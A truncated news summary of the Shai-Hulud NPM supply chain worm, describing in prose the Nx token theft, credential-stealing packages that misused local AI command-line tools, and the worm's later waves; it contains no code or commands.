Investigating Shai-Hulud: Inside the NPM Supply Chain Worm

41 days ago 18 views The Sequence the-sequence.com

On August 26, 2025, attackers exploited a GitHub Actions injection vulnerability inside Nx’s workflow, using a manipulated pull request title to run shell commands and extract the company’s NPM publishing token. With that access, they published malicious versions of trusted Nx packages. Once installed, those packages hijacked local AI command line tools to scan victim systems for credentials, SSH keys, and crypto wallets.

The compromise didn’t end there. Weeks later, in September 2025, multiple cybersecurity vendors and CISA reported a broader supply chain infection tied to the same operation. The malware, now dubbed “Shai-Hulud,” leveraged self-propagation capabilities to turn popular NPM packages into malicious script containers. Shai Hulud primarily steals and exfiltrates credentials leveraging trufflehog, while also attempting to copy itself into additional NPM packages and make private GitHub repositories public to leak data.

trufflehog

By November 2025, GitGuardian observed a high second wave of infections dubbed “Shai-Hulud 2.0,” where the malware’s capabilities expanded to include backdoor installation and remote access. Using the victim’s compromised GitHub authentication